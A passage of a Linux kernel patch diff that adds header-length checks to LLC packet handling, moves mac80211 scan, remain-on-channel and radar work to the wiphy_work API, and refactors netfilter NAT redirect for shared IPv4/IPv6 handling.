+ 	if (skb->protocol == htons(ETH_P_802_2)) {
+-		__be16 pdulen = eth_hdr(skb)->h_proto;
+-		s32 data_size = ntohs(pdulen) - llc_len;
++		__be16 pdulen;
++		s32 data_size;
++
++		if (skb->mac_len < ETH_HLEN)
++			return 0;
++
++		pdulen = eth_hdr(skb)->h_proto;
++		data_size = ntohs(pdulen) - llc_len;
+ 
+ 		if (data_size < 0 ||
+ 		    !pskb_may_pull(skb, data_size))
+diff --git a/net/llc/llc_s_ac.c b/net/llc/llc_s_ac.c
+index 79d1cef8f15a9..06fb8e6944b06 100644
+--- a/net/llc/llc_s_ac.c
++++ b/net/llc/llc_s_ac.c
+@@ -153,6 +153,9 @@ int llc_sap_action_send_test_r(struct llc_sap *sap, struct sk_buff *skb)
+ 	int rc = 1;
+ 	u32 data_size;
+ 
++	if (skb->mac_len < ETH_HLEN)
++		return 1;
++
+ 	llc_pdu_decode_sa(skb, mac_da);
+ 	llc_pdu_decode_da(skb, mac_sa);
+ 	llc_pdu_decode_ssap(skb, &dsap);
+diff --git a/net/llc/llc_station.c b/net/llc/llc_station.c
+index 05c6ae0920534..f506542925109 100644
+--- a/net/llc/llc_station.c
++++ b/net/llc/llc_station.c
+@@ -76,6 +76,9 @@ static int llc_station_ac_send_test_r(struct sk_buff *skb)
+ 	u32 data_size;
+ 	struct sk_buff *nskb;
+ 
++	if (skb->mac_len < ETH_HLEN)
++		goto out;
++
+ 	/* The test request command is type U (llc_len = 3) */
+ 	data_size = ntohs(eth_hdr(skb)->h_proto) - 3;
+ 	nskb = llc_alloc_frame(NULL, skb->dev, LLC_PDU_TYPE_U, data_size);
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 99a976ea17498..d5dd2d9e89b48 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -1361,7 +1361,7 @@ struct ieee80211_local {
+ 	/* wowlan is enabled -- don't reconfig on resume */
+ 	bool wowlan;
+ 
+-	struct work_struct radar_detected_work;
++	struct wiphy_work radar_detected_work;
+ 
+ 	/* number of RX chains the hardware has */
+ 	u8 rx_chains;
+@@ -1438,14 +1438,14 @@ struct ieee80211_local {
+ 	int hw_scan_ies_bufsize;
+ 	struct cfg80211_scan_info scan_info;
+ 
+-	struct work_struct sched_scan_stopped_work;
++	struct wiphy_work sched_scan_stopped_work;
+ 	struct ieee80211_sub_if_data __rcu *sched_scan_sdata;
+ 	struct cfg80211_sched_scan_request __rcu *sched_scan_req;
+ 	u8 scan_addr[ETH_ALEN];
+ 
+ 	unsigned long leave_oper_channel_time;
+ 	enum mac80211_scan_state next_scan_state;
+-	struct delayed_work scan_work;
++	struct wiphy_delayed_work scan_work;
+ 	struct ieee80211_sub_if_data __rcu *scan_sdata;
+ 	/* For backward compatibility only -- do not use */
+ 	struct cfg80211_chan_def _oper_chandef;
+@@ -1538,9 +1538,9 @@ struct ieee80211_local {
+ 	/*
+ 	 * Remain-on-channel support
+ 	 */
+-	struct delayed_work roc_work;
++	struct wiphy_delayed_work roc_work;
+ 	struct list_head roc_list;
+-	struct work_struct hw_roc_start, hw_roc_done;
++	struct wiphy_work hw_roc_start, hw_roc_done;
+ 	unsigned long hw_roc_start_time;
+ 	u64 roc_cookie_counter;
+ 
+@@ -1862,7 +1862,7 @@ int ieee80211_mesh_csa_beacon(struct ieee80211_sub_if_data *sdata,
+ int ieee80211_mesh_finish_csa(struct ieee80211_sub_if_data *sdata);
+ 
+ /* scan/BSS handling */
+-void ieee80211_scan_work(struct work_struct *work);
++void ieee80211_scan_work(struct wiphy *wiphy, struct wiphy_work *work);
+ int ieee80211_request_ibss_scan(struct ieee80211_sub_if_data *sdata,
+ 				const u8 *ssid, u8 ssid_len,
+ 				struct ieee80211_channel **channels,
+@@ -1892,7 +1892,8 @@ int ieee80211_request_sched_scan_start(struct ieee80211_sub_if_data *sdata,
+ 				       struct cfg80211_sched_scan_request *req);
+ int ieee80211_request_sched_scan_stop(struct ieee80211_local *local);
+ void ieee80211_sched_scan_end(struct ieee80211_local *local);
+-void ieee80211_sched_scan_stopped_work(struct work_struct *work);
++void ieee80211_sched_scan_stopped_work(struct wiphy *wiphy,
++				       struct wiphy_work *work);
+ 
+ /* off-channel/mgmt-tx */
+ void ieee80211_offchannel_stop_vifs(struct ieee80211_local *local);
+@@ -2483,7 +2484,8 @@ bool ieee80211_is_radar_required(struct ieee80211_local *local);
+ void ieee80211_dfs_cac_timer(unsigned long data);
+ void ieee80211_dfs_cac_timer_work(struct work_struct *work);
+ void ieee80211_dfs_cac_cancel(struct ieee80211_local *local);
+-void ieee80211_dfs_radar_detected_work(struct work_struct *work);
++void ieee80211_dfs_radar_detected_work(struct wiphy *wiphy,
++				       struct wiphy_work *work);
+ int ieee80211_send_action_csa(struct ieee80211_sub_if_data *sdata,
+ 			      struct cfg80211_csa_settings *csa_settings);
+ 
+diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
+index 8dd3c10a99e0b..e00e1bf0f754a 100644
+--- a/net/mac80211/iface.c
++++ b/net/mac80211/iface.c
+@@ -697,7 +697,7 @@ static void ieee80211_do_stop(struct ieee80211_sub_if_data *sdata, bool going_do
+ 	ieee80211_recalc_ps(local);
+ 
+ 	if (cancel_scan)
+-		flush_delayed_work(&local->scan_work);
++		wiphy_delayed_work_flush(local->hw.wiphy, &local->scan_work);
+ 
+ 	if (local->open_count == 0) {
+ 		ieee80211_stop_device(local);
+diff --git a/net/mac80211/main.c b/net/mac80211/main.c
+index 02b5abc7326bc..6faba47b7b0ea 100644
+--- a/net/mac80211/main.c
++++ b/net/mac80211/main.c
+@@ -334,10 +334,7 @@ static void ieee80211_restart_work(struct work_struct *work)
+ 	struct ieee80211_sub_if_data *sdata;
+ 	int ret;
+ 
+-	/* wait for scan work complete */
+ 	flush_workqueue(local->workqueue);
+-	flush_work(&local->sched_scan_stopped_work);
+-	flush_work(&local->radar_detected_work);
+ 
+ 	rtnl_lock();
+ 	/* we might do interface manipulations, so need both */
+@@ -377,8 +374,8 @@ static void ieee80211_restart_work(struct work_struct *work)
+ 	ieee80211_scan_cancel(local);
+ 
+ 	/* make sure any new ROC will consider local->in_reconfig */
+-	flush_delayed_work(&local->roc_work);
+-	flush_work(&local->hw_roc_done);
++	wiphy_delayed_work_flush(local->hw.wiphy, &local->roc_work);
++	wiphy_work_flush(local->hw.wiphy, &local->hw_roc_done);
+ 
+ 	/* wait for all packet processing to be done */
+ 	synchronize_net();
+@@ -807,12 +804,12 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
+ 	INIT_LIST_HEAD(&local->chanctx_list);
+ 	mutex_init(&local->chanctx_mtx);
+ 
+-	INIT_DELAYED_WORK(&local->scan_work, ieee80211_scan_work);
++	wiphy_delayed_work_init(&local->scan_work, ieee80211_scan_work);
+ 
+ 	INIT_WORK(&local->restart_work, ieee80211_restart_work);
+ 
+-	INIT_WORK(&local->radar_detected_work,
+-		  ieee80211_dfs_radar_detected_work);
++	wiphy_work_init(&local->radar_detected_work,
++			ieee80211_dfs_radar_detected_work);
+ 
+ 	INIT_WORK(&local->reconfig_filter, ieee80211_reconfig_filter);
+ 	local->smps_mode = IEEE80211_SMPS_OFF;
+@@ -823,8 +820,8 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
+ 		  ieee80211_dynamic_ps_disable_work);
+ 	timer_setup(&local->dynamic_ps_timer, ieee80211_dynamic_ps_timer, 0);
+ 
+-	INIT_WORK(&local->sched_scan_stopped_work,
+-		  ieee80211_sched_scan_stopped_work);
++	wiphy_work_init(&local->sched_scan_stopped_work,
++			ieee80211_sched_scan_stopped_work);
+ 
+ 	spin_lock_init(&local->ack_status_lock);
+ 	idr_init(&local->ack_status_frames);
+@@ -1471,13 +1468,15 @@ void ieee80211_unregister_hw(struct ieee80211_hw *hw)
+ 	 */
+ 	ieee80211_remove_interfaces(local);
+ 
++	wiphy_lock(local->hw.wiphy);
++	wiphy_delayed_work_cancel(local->hw.wiphy, &local->roc_work);
++	wiphy_work_cancel(local->hw.wiphy, &local->sched_scan_stopped_work);
++	wiphy_work_cancel(local->hw.wiphy, &local->radar_detected_work);
++	wiphy_unlock(local->hw.wiphy);
+ 	rtnl_unlock();
+ 
+-	cancel_delayed_work_sync(&local->roc_work);
+ 	cancel_work_sync(&local->restart_work);
+ 	cancel_work_sync(&local->reconfig_filter);
+-	flush_work(&local->sched_scan_stopped_work);
+-	flush_work(&local->radar_detected_work);
+ 
+ 	ieee80211_clear_tx_pending(local);
+ 	rate_control_deinitialize(local);
+diff --git a/net/mac80211/offchannel.c b/net/mac80211/offchannel.c
+index d78c82d6b6966..50dc379ca097e 100644
+--- a/net/mac80211/offchannel.c
++++ b/net/mac80211/offchannel.c
+@@ -230,7 +230,7 @@ static bool ieee80211_recalc_sw_work(struct ieee80211_local *local,
+ 	if (dur == LONG_MAX)
+ 		return false;
+ 
+-	mod_delayed_work(local->workqueue, &local->roc_work, dur);
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->roc_work, dur);
+ 	return true;
+ }
+ 
+@@ -258,7 +258,7 @@ static void ieee80211_handle_roc_started(struct ieee80211_roc_work *roc,
+ 	roc->notified = true;
+ }
+ 
+-static void ieee80211_hw_roc_start(struct work_struct *work)
++static void ieee80211_hw_roc_start(struct wiphy *wiphy, struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, hw_roc_start);
+@@ -285,7 +285,7 @@ void ieee80211_ready_on_channel(struct ieee80211_hw *hw)
+ 
+ 	trace_api_ready_on_channel(local);
+ 
+-	ieee80211_queue_work(hw, &local->hw_roc_start);
++	wiphy_work_queue(hw->wiphy, &local->hw_roc_start);
+ }
+ EXPORT_SYMBOL_GPL(ieee80211_ready_on_channel);
+ 
+@@ -338,7 +338,7 @@ static void _ieee80211_start_next_roc(struct ieee80211_local *local)
+ 				tmp->started = true;
+ 				tmp->abort = true;
+ 			}
+-			ieee80211_queue_work(&local->hw, &local->hw_roc_done);
++			wiphy_work_queue(local->hw.wiphy, &local->hw_roc_done);
+ 			return;
+ 		}
+ 
+@@ -368,8 +368,8 @@ static void _ieee80211_start_next_roc(struct ieee80211_local *local)
+ 			ieee80211_hw_config(local, 0);
+ 		}
+ 
+-		ieee80211_queue_delayed_work(&local->hw, &local->roc_work,
+-					     msecs_to_jiffies(min_dur));
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->roc_work,
++					 msecs_to_jiffies(min_dur));
+ 
+ 		/* tell userspace or send frame(s) */
+ 		list_for_each_entry(tmp, &local->roc_list, list) {
+@@ -407,8 +407,8 @@ void ieee80211_start_next_roc(struct ieee80211_local *local)
+ 		_ieee80211_start_next_roc(local);
+ 	} else {
+ 		/* delay it a bit */
+-		ieee80211_queue_delayed_work(&local->hw, &local->roc_work,
+-					     round_jiffies_relative(HZ/2));
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->roc_work,
++					 round_jiffies_relative(HZ / 2));
+ 	}
+ }
+ 
+@@ -451,7 +451,7 @@ static void __ieee80211_roc_work(struct ieee80211_local *local)
+ 	}
+ }
+ 
+-static void ieee80211_roc_work(struct work_struct *work)
++static void ieee80211_roc_work(struct wiphy *wiphy, struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, roc_work.work);
+@@ -461,7 +461,7 @@ static void ieee80211_roc_work(struct work_struct *work)
+ 	mutex_unlock(&local->mtx);
+ }
+ 
+-static void ieee80211_hw_roc_done(struct work_struct *work)
++static void ieee80211_hw_roc_done(struct wiphy *wiphy, struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, hw_roc_done);
+@@ -482,7 +482,7 @@ void ieee80211_remain_on_channel_expired(struct ieee80211_hw *hw)
+ 
+ 	trace_api_remain_on_channel_expired(local);
+ 
+-	ieee80211_queue_work(hw, &local->hw_roc_done);
++	wiphy_work_queue(hw->wiphy, &local->hw_roc_done);
+ }
+ EXPORT_SYMBOL_GPL(ieee80211_remain_on_channel_expired);
+ 
+@@ -586,8 +586,8 @@ static int ieee80211_start_roc_work(struct ieee80211_local *local,
+ 		/* if not HW assist, just queue & schedule work */
+ 		if (!local->ops->remain_on_channel) {
+ 			list_add_tail(&roc->list, &local->roc_list);
+-			ieee80211_queue_delayed_work(&local->hw,
+-						     &local->roc_work, 0);
++			wiphy_delayed_work_queue(local->hw.wiphy,
++						 &local->roc_work, 0);
+ 		} else {
+ 			/* otherwise actually kick it off here
+ 			 * (for error handling)
+@@ -695,7 +695,7 @@ static int ieee80211_cancel_roc(struct ieee80211_local *local,
+ 	if (!cookie)
+ 		return -ENOENT;
+ 
+-	flush_work(&local->hw_roc_start);
++	wiphy_work_flush(local->hw.wiphy, &local->hw_roc_start);
+ 
+ 	mutex_lock(&local->mtx);
+ 	list_for_each_entry_safe(roc, tmp, &local->roc_list, list) {
+@@ -745,7 +745,7 @@ static int ieee80211_cancel_roc(struct ieee80211_local *local,
+ 	} else {
+ 		/* go through work struct to return to the operating channel */
+ 		found->abort = true;
+-		mod_delayed_work(local->workqueue, &local->roc_work, 0);
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->roc_work, 0);
+ 	}
+ 
+  out_unlock:
+@@ -994,9 +994,9 @@ int ieee80211_mgmt_tx_cancel_wait(struct wiphy *wiphy,
+ 
+ void ieee80211_roc_setup(struct ieee80211_local *local)
+ {
+-	INIT_WORK(&local->hw_roc_start, ieee80211_hw_roc_start);
+-	INIT_WORK(&local->hw_roc_done, ieee80211_hw_roc_done);
+-	INIT_DELAYED_WORK(&local->roc_work, ieee80211_roc_work);
++	wiphy_work_init(&local->hw_roc_start, ieee80211_hw_roc_start);
++	wiphy_work_init(&local->hw_roc_done, ieee80211_hw_roc_done);
++	wiphy_delayed_work_init(&local->roc_work, ieee80211_roc_work);
+ 	INIT_LIST_HEAD(&local->roc_list);
+ }
+ 
+diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c
+index dc3cdee51e660..c37e2576f1c13 100644
+--- a/net/mac80211/scan.c
++++ b/net/mac80211/scan.c
+@@ -291,8 +291,8 @@ void ieee80211_scan_rx(struct ieee80211_local *local, struct sk_buff *skb)
+ 		 * the beacon/proberesp rx gives us an opportunity to upgrade
+ 		 * to active scan
+ 		 */
+-		 set_bit(SCAN_BEACON_DONE, &local->scanning);
+-		 ieee80211_queue_delayed_work(&local->hw, &local->scan_work, 0);
++		set_bit(SCAN_BEACON_DONE, &local->scanning);
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work, 0);
+ 	}
+ 
+ 	if (ieee80211_is_probe_resp(mgmt->frame_control)) {
+@@ -522,7 +522,7 @@ void ieee80211_scan_completed(struct ieee80211_hw *hw,
+ 
+ 	memcpy(&local->scan_info, info, sizeof(*info));
+ 
+-	ieee80211_queue_delayed_work(&local->hw, &local->scan_work, 0);
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work, 0);
+ }
+ EXPORT_SYMBOL(ieee80211_scan_completed);
+ 
+@@ -562,8 +562,7 @@ static int ieee80211_start_sw_scan(struct ieee80211_local *local,
+ 	/* We need to set power level at maximum rate for scanning. */
+ 	ieee80211_hw_config(local, 0);
+ 
+-	ieee80211_queue_delayed_work(&local->hw,
+-				     &local->scan_work, 0);
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work, 0);
+ 
+ 	return 0;
+ }
+@@ -620,8 +619,8 @@ void ieee80211_run_deferred_scan(struct ieee80211_local *local)
+ 					lockdep_is_held(&local->mtx))))
+ 		return;
+ 
+-	ieee80211_queue_delayed_work(&local->hw, &local->scan_work,
+-				     round_jiffies_relative(0));
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work,
++				 round_jiffies_relative(0));
+ }
+ 
+ static void ieee80211_send_scan_probe_req(struct ieee80211_sub_if_data *sdata,
+@@ -812,8 +811,8 @@ static int __ieee80211_start_scan(struct ieee80211_sub_if_data *sdata,
+ 		}
+ 
+ 		/* Now, just wait a bit and we are all done! */
+-		ieee80211_queue_delayed_work(&local->hw, &local->scan_work,
+-					     next_delay);
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work,
++					 next_delay);
+ 		return 0;
+ 	} else {
+ 		/* Do normal software scan */
+@@ -1060,7 +1059,7 @@ static void ieee80211_scan_state_resume(struct ieee80211_local *local,
+ 	local->next_scan_state = SCAN_SET_CHANNEL;
+ }
+ 
+-void ieee80211_scan_work(struct work_struct *work)
++void ieee80211_scan_work(struct wiphy *wiphy, struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, scan_work.work);
+@@ -1154,7 +1153,8 @@ void ieee80211_scan_work(struct work_struct *work)
+ 		}
+ 	} while (next_delay == 0);
+ 
+-	ieee80211_queue_delayed_work(&local->hw, &local->scan_work, next_delay);
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work,
++				 next_delay);
+ 	goto out;
+ 
+ out_complete:
+@@ -1297,12 +1297,7 @@ void ieee80211_scan_cancel(struct ieee80211_local *local)
+ 		goto out;
+ 	}
+ 
+-	/*
+-	 * If the work is currently running, it must be blocked on
+-	 * the mutex, but we'll set scan_sdata = NULL and it'll
+-	 * simply exit once it acquires the mutex.
+-	 */
+-	cancel_delayed_work(&local->scan_work);
++	wiphy_delayed_work_cancel(local->hw.wiphy, &local->scan_work);
+ 	/* and clean up */
+ 	memset(&local->scan_info, 0, sizeof(local->scan_info));
+ 	__ieee80211_scan_completed(&local->hw, true);
+@@ -1444,10 +1439,11 @@ void ieee80211_sched_scan_end(struct ieee80211_local *local)
+ 
+ 	mutex_unlock(&local->mtx);
+ 
+-	cfg80211_sched_scan_stopped(local->hw.wiphy, 0);
++	cfg80211_sched_scan_stopped_locked(local->hw.wiphy, 0);
+ }
+ 
+-void ieee80211_sched_scan_stopped_work(struct work_struct *work)
++void ieee80211_sched_scan_stopped_work(struct wiphy *wiphy,
++				       struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local,
+@@ -1470,6 +1466,6 @@ void ieee80211_sched_scan_stopped(struct ieee80211_hw *hw)
+ 	if (local->in_reconfig)
+ 		return;
+ 
+-	schedule_work(&local->sched_scan_stopped_work);
++	wiphy_work_queue(hw->wiphy, &local->sched_scan_stopped_work);
+ }
+ EXPORT_SYMBOL(ieee80211_sched_scan_stopped);
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index b8c6f6a668fc9..49b71453dec37 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -2918,7 +2918,7 @@ void ieee80211_sta_set_max_amsdu_subframes(struct sta_info *sta,
+ 				   WLAN_EXT_CAPA9_MAX_MSDU_IN_AMSDU_MSB) << 1;
+ 
+ 	if (val)
+-		sta->sta.max_amsdu_subframes = 4 << val;
++		sta->sta.max_amsdu_subframes = 4 << (4 - val);
+ }
+ 
+ #ifdef CONFIG_LOCKDEP
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 98806c359b173..1088d90e355ba 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -2234,8 +2234,8 @@ static void ieee80211_flush_completed_scan(struct ieee80211_local *local,
+ 		 */
+ 		if (aborted)
+ 			set_bit(SCAN_ABORTED, &local->scanning);
+-		ieee80211_queue_delayed_work(&local->hw, &local->scan_work, 0);
+-		flush_delayed_work(&local->scan_work);
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work, 0);
++		wiphy_delayed_work_flush(local->hw.wiphy, &local->scan_work);
+ 	}
+ }
+ 
+@@ -4069,7 +4069,8 @@ void ieee80211_dfs_cac_cancel(struct ieee80211_local *local)
+ 	mutex_unlock(&local->mtx);
+ }
+ 
+-void ieee80211_dfs_radar_detected_work(struct work_struct *work)
++void ieee80211_dfs_radar_detected_work(struct wiphy *wiphy,
++				       struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, radar_detected_work);
+@@ -4087,9 +4088,7 @@ void ieee80211_dfs_radar_detected_work(struct work_struct *work)
+ 	}
+ 	mutex_unlock(&local->chanctx_mtx);
+ 
+-	wiphy_lock(local->hw.wiphy);
+ 	ieee80211_dfs_cac_cancel(local);
+-	wiphy_unlock(local->hw.wiphy);
+ 
+ 	if (num_chanctx > 1)
+ 		/* XXX: multi-channel is not supported yet */
+@@ -4104,7 +4103,7 @@ void ieee80211_radar_detected(struct ieee80211_hw *hw)
+ 
+ 	trace_api_radar_detected(local);
+ 
+-	schedule_work(&local->radar_detected_work);
++	wiphy_work_queue(hw->wiphy, &local->radar_detected_work);
+ }
+ EXPORT_SYMBOL(ieee80211_radar_detected);
+ 
+diff --git a/net/netfilter/nf_nat_redirect.c b/net/netfilter/nf_nat_redirect.c
+index f91579c821e9a..5b37487d9d11f 100644
+--- a/net/netfilter/nf_nat_redirect.c
++++ b/net/netfilter/nf_nat_redirect.c
+@@ -10,6 +10,7 @@
+ 
+ #include <linux/if.h>
+ #include <linux/inetdevice.h>
++#include <linux/in.h>
+ #include <linux/ip.h>
+ #include <linux/kernel.h>
+ #include <linux/netdevice.h>
+@@ -24,81 +25,104 @@
+ #include <net/netfilter/nf_nat.h>
+ #include <net/netfilter/nf_nat_redirect.h>
+ 
++static unsigned int
++nf_nat_redirect(struct sk_buff *skb, const struct nf_nat_range2 *range,
++		const union nf_inet_addr *newdst)
++{
++	struct nf_nat_range2 newrange;
++	enum ip_conntrack_info ctinfo;
++	struct nf_conn *ct;
++
++	ct = nf_ct_get(skb, &ctinfo);
++
++	memset(&newrange, 0, sizeof(newrange));
++
++	newrange.flags		= range->flags | NF_NAT_RANGE_MAP_IPS;
++	newrange.min_addr	= *newdst;
++	newrange.max_addr	= *newdst;
++	newrange.min_proto	= range->min_proto;
++	newrange.max_proto	= range->max_proto;
++
++	return nf_nat_setup_info(ct, &newrange, NF_NAT_MANIP_DST);
++}
++
+ unsigned int
+-nf_nat_redirect_ipv4(struct sk_buff *skb,
+-		     const struct nf_nat_ipv4_multi_range_compat *mr,
++nf_nat_redirect_ipv4(struct sk_buff *skb, const struct nf_nat_range2 *range,
+ 		     unsigned int hooknum)
+ {
+-	struct nf_conn *ct;
+-	enum ip_conntrack_info ctinfo;
+-	__be32 newdst;
+-	struct nf_nat_range2 newrange;
++	union nf_inet_addr newdst = {};
+ 
+ 	WARN_ON(hooknum != NF_INET_PRE_ROUTING &&
+ 		hooknum != NF_INET_LOCAL_OUT);
+ 
+-	ct = nf_ct_get(skb, &ctinfo);
+-	WARN_ON(!(ct && (ctinfo == IP_CT_NEW || ctinfo == IP_CT_RELATED)));
+-
+ 	/* Local packets: make them go to loopback */
+ 	if (hooknum == NF_INET_LOCAL_OUT) {
+-		newdst = htonl(0x7F000001);
++		newdst.ip = htonl(INADDR_LOOPBACK);
+ 	} else {
+ 		const struct in_device *indev;
+ 
+-		newdst = 0;
+-
+ 		indev = __in_dev_get_rcu(skb->dev);
+ 		if (indev) {
+ 			const struct in_ifaddr *ifa;
+ 
+ 			ifa = rcu_dereference(indev->ifa_list);
+ 			if (ifa)
+-				newdst = ifa->ifa_local;
++				newdst.ip = ifa->ifa_local;
+ 		}
+ 
+-		if (!newdst)
++		if (!newdst.ip)
+ 			return NF_DROP;
+ 	}
+ 
+-	/* Transfer from original range. */
+-	memset(&newrange.min_addr, 0, sizeof(newrange.min_addr));
+-	memset(&newrange.max_addr, 0, sizeof(newrange.max_addr));
+-	newrange.flags	     = mr->range[0].flags | NF_NAT_RANGE_MAP_IPS;
+-	newrange.min_addr.ip = newdst;
+-	newrange.max_addr.ip = newdst;
+-	newrange.min_proto   = mr->range[0].min;
+-	newrange.max_proto   = mr->range[0].max;
+-
+-	/* Hand modified range to generic setup. */
+-	return nf_nat_setup_info(ct, &newrange, NF_NAT_MANIP_DST);
++	return nf_nat_redirect(skb, range, &newdst);
+ }
+ EXPORT_SYMBOL_GPL(nf_nat_redirect_ipv4);
+ 
+ static const struct in6_addr loopback_addr = IN6ADDR_LOOPBACK_INIT;
+ 
++static bool nf_nat_redirect_ipv6_usable(const struct inet6_ifaddr *ifa, unsigned int scope)
++{
++	unsigned int ifa_addr_type = ipv6_addr_type(&ifa->addr);
++
++	if (ifa_addr_type & IPV6_ADDR_MAPPED)
++		return false;
++
++	if ((ifa->flags & IFA_F_TENTATIVE) && (!(ifa->flags & IFA_F_OPTIMISTIC)))
++		return false;
++
++	if (scope) {
++		unsigned int ifa_scope = ifa_addr_type & IPV6_ADDR_SCOPE_MASK;
++
++		if (!(scope & ifa_scope))
++			return false;
++	}
++
++	return true;
++}
++
+ unsigned int
+ nf_nat_redirect_ipv6(struct sk_buff *skb, const struct nf_nat_range2 *range,
+ 		     unsigned int hooknum)
+ {
+-	struct nf_nat_range2 newrange;
+-	struct in6_addr newdst;
+-	enum ip_conntrack_info ctinfo;
+-	struct nf_conn *ct;
++	union nf_inet_addr newdst = {};
+ 
+-	ct = nf_ct_get(skb, &ctinfo);
+ 	if (hooknum == NF_INET_LOCAL_OUT) {
+-		newdst = loopback_addr;
++		newdst.in6 = loopback_addr;
+ 	} else {
++		unsigned int scope = ipv6_addr_scope(&ipv6_hdr(skb)->daddr);
+ 		struct inet6_dev *idev;
+-		struct inet6_ifaddr *ifa;
+ 		bool addr = false;
+ 
+ 		idev = __in6_dev_get(skb->dev);
+ 		if (idev != NULL) {
++			const struct inet6_ifaddr *ifa;
++
+ 			read_lock_bh(&idev->lock);
+ 			list_for_each_entry(ifa, &idev->addr_list, if_list) {
+-				newdst = ifa->addr;
++				if (!nf_nat_redirect_ipv6_usable(ifa, scope))
++					continue;
++
++				newdst.in6 = ifa->addr;
+ 				addr = true;
+ 				break;
+ 			}
+@@ -109,12 +133,6 @@ nf_nat_redirect_ipv6(struct sk_buff *skb, const struct nf_nat_range2 *range,
+ 			return NF_DROP;
+ 	}
+ 
+-	newrange.flags		= range->flags | NF_NAT_RANGE_MAP_IPS;
+-	newrange.min_addr.in6	= newdst;
+-	newrange.max_addr.in6	= newdst;
+-	newrange.min_proto	= range->min_proto;
+-	newrange.max_proto	= range->max_proto;
+-
+-	return nf_nat_setup_info(ct, &newrange, NF_NAT_MANIP_DST);
++	return nf_nat_redirect(skb, range, &newdst);
+ }
+ EXPORT_SYMBOL_GPL(nf_nat_redirect_ipv6);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 5c783199b4999..d6d59e36d17a7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3279,10 +3279,6 @@ static int __nf_tables_dump_rules(struct sk_buff *skb,
+ 			goto cont_skip;
+ 		if (*idx < s_idx)
+ 			goto cont;
+-		if (*idx > s_idx) {
+-			memset(&cb->args[1], 0,
+-					sizeof(cb->args) - sizeof(cb->args[0]));
+-		}
+ 		if (prule)
+ 			handle = prule->handle;
+ 		else
+diff --git a/net/netfilter/nft_redir.c b/net/netfilter/nft_redir.c
+index 5ed64b2bd15e8..08b408d3e113d 100644
+--- a/net/netfilter/nft_redir.c
++++ b/net/netfilter/nft_redir.c
+@@ -64,6 +64,8 @@ static int nft_redir_init(const struct nft_ctx *ctx,
+ 		} else {
+ 			priv->sreg_proto_max = priv->sreg_proto_min;
+ 		}
++
++		priv->flags |= NF_NAT_RANGE_PROTO_SPECIFIED;
+ 	}
+ 
+ 	if (tb[NFTA_REDIR_FLAGS]) {
+@@ -98,25 +100,37 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
+-static void nft_redir_ipv4_eval(const struct nft_expr *expr,
+-				struct nft_regs *regs,
+-				const struct nft_pktinfo *pkt)
++static void nft_redir_eval(const struct nft_expr *expr,
++			   struct nft_regs *regs,
++			   const struct nft_pktinfo *pkt)
+ {
+-	struct nft_redir *priv = nft_expr_priv(expr);
+-	struct nf_nat_ipv4_multi_range_compat mr;
++	const struct nft_redir *priv = nft_expr_priv(expr);
++	struct nf_nat_range2 range;
+ 
+-	memset(&mr, 0, sizeof(mr));
++	memset(&range, 0, sizeof(range));
++	range.flags = priv->flags;
+ 	if (priv->sreg_proto_min) {
+-		mr.range[0].min.all = (__force __be16)nft_reg_load16(
+-			&regs->data[priv->sreg_proto_min]);
+-		mr.range[0].max.all = (__force __be16)nft_reg_load16(
+-			&regs->data[priv->sreg_proto_max]);
+-		mr.range[0].flags |= NF_NAT_RANGE_PROTO_SPECIFIED;
++		range.min_proto.all = (__force __be16)
++			nft_reg_load16(&regs->data[priv->sreg_proto_min]);
++		range.max_proto.all = (__force __be16)
++			nft_reg_load16(&regs->data[priv->sreg_proto_max]);
+ 	}
+ 
+-	mr.range[0].flags |= priv->flags;
+-
+-	regs->verdict.code = nf_nat_redirect_ipv4(pkt->skb, &mr, nft_hook(pkt));
++	switch (nft_pf(pkt)) {
++	case NFPROTO_IPV4:
++		regs->verdict.code = nf_nat_redirect_ipv4(pkt->skb, &range,
++							  nft_hook(pkt));
++		break;
++#ifdef CONFIG_NF_TABLES_IPV6
++	case NFPROTO_IPV6:
++		regs->verdict.code = nf_nat_redirect_ipv6(pkt->skb, &range,
++							  nft_hook(pkt));
++		break;
++#endif
++	default:
++		WARN_ON_ONCE(1);
++		break;
++	}
+ }
+ 
+ static void
+@@ -129,7 +143,7 @@ static struct nft_expr_type nft_redir_ipv4_type;
+ static const struct nft_expr_ops nft_redir_ipv4_ops = {
+ 	.type		= &nft_redir_ipv4_type,
+ 	.size		= NFT_EXPR_SIZE(sizeof(struct nft_redir)),
